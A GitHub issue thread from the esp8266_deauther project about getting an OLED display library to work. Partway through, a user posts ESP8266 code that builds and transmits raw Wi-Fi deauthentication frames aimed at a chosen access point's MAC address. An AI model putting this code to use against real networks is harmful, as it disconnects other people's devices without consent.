SpacehuhnTech/esp8266_deauther #955: Adafruit 1306 issue

MrJabu, 2018-09-29:
What's the trick to get this to work with the Adafuit1306 library?

spacehuhn, 2018-09-29:
Not sure what you mean, but if you want to know how to setup the OLED read this:
https://github.com/spacehuhn/esp8266_deauther/wiki/Setup-Display-&-Buttons

I used this library:
https://github.com/ThingPulse/esp8266-oled-ssd1306

MrJabu, 2018-09-29:
> Not sure what you mean, but if you want to know how to setup the OLED read this:
> https://github.com/spacehuhn/esp8266_deauther/wiki/Setup-Display-&-Buttons
> 
> I used this library:
> https://github.com/ThingPulse/esp8266-oled-ssd1306

i am trying to mess around with it and use part of your deauth code but i need to use your module to get it to function. the problem is when i use your module it does not recognize the adafruit library and i am not sure how to change it over to use the one you linked.

MrJabu, 2018-09-29:
if i include the adafruit library i get an "error compiling for board ..."

MrJabu, 2018-09-29:
how do i add the adafruit and use your module for the esp8266?

spacehuhn, 2018-09-29:
lt sounds like your problem is more related to the library working on the ESP8266. If you have problems with the Adafruit library, maybe ask on their GitHub repository?

I use a different library for the screen that has been optimized for the ESP8266. I would recommend you to use the same, it has a very good documentation as well.

If it's something that comes up only with the deauther code, then I need the errors and a detailed description of what you're doing.

spacehuhn, 2018-09-30:
I used this library:
https://github.com/ThingPulse/esp8266-oled-ssd1306

MrJabu, 2018-09-30:
> I used this library:
> https://github.com/ThingPulse/esp8266-oled-ssd1306

i think i got it!!! thank you for your help!!

MrJabu, 2018-10-01:
This is the code i am trying to use.

void Deauth(){
  wifi_promiscuous_enable(1); 
  wifi_set_channel(1);//(WiFi.channel(i));

  deauth[0] = 0xc0; 
  wifi_send_pkt_freedom(deauth, 26, 0);
  wifi_send_pkt_freedom(deauth, 26, 0);
  wifi_send_pkt_freedom(deauth, 26, 0);
  delay(1); 

  wifi_promiscuous_enable(0); 
}

MrJabu, 2018-10-01:
#include <ESP8266WiFi.h>

extern "C" {
  #include "user_interface.h"
}               
   
uint8_t deauthPacket[26] = {
/* 0 - 1 / 0xC0, 0x00, //type, subtype c0: deauth (a0: disassociate)
/ 2 - 3 / 0x00, 0x00, //duration (SDK takes care of that)
/ 4 - 9 / 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,//reciever (target)
/ 10 - 15 / 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, //source (ap)
/ 16 - 21 / 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, //BSSID (ap)
/ 22 - 23 / 0x00, 0x00, //fragment & squence number
/ 24 - 25 */ 0x01, 0x00 //reason code (1 = unspecified reason)
};

void setup() {
  delay(500);
  wifi_set_opmode(STATION_MODE);
  wifi_promiscuous_enable(1); 
}

void loop() {

    wifi_set_channel(1);
    
    packet[0] = 0xc0;
    
    wifi_send_pkt_freedom(packet, 26, 0);
    wifi_send_pkt_freedom(packet, 26, 0);
    wifi_send_pkt_freedom(packet, 26, 0);
    delay(1);
    wifi_promiscuous_enable(0); 
}

This code works when i set

/ 10 - 15 / 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, //source (ap)
/ 16 - 21 / 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, //BSSID (ap

to the networks MAC i want to disconnect but it doesnt work (only disconnects my phone) when i move it to the format shown in the above comment.

MrJabu, 2018-10-06:
Is what i am doing correct?

Delfino520, 2018-10-16:
> Not sure what you mean, but if you want to know how to setup the OLED read this:
> https://github.com/spacehuhn/esp8266_deauther/wiki/Setup-Display-&-Buttons
> 
> I used this library:
> https://github.com/ThingPulse/esp8266-oled-ssd1306

@spacehuhn Esp8266-WiFi-Bait has been upload to Github, feel free to check it out!

https://github.com/Delfino520/Esp8266-WiFi-Bait﻿

tobozo, 2018-10-16:
@Delfino520 Your readme looks great and well illustrated, but the content of the repo doesn't look right.

Please expand your zip files so users checking your project can also use the web interface to see the source instead of having to download & deploy locally an unknown binary.

If you need to attach binaries, use the "release" tab and add them here.

spacehuhn, 2018-10-16:
Since the original question has been answered, I'm closing this now.

closed 2018-10-16 by spacehuhn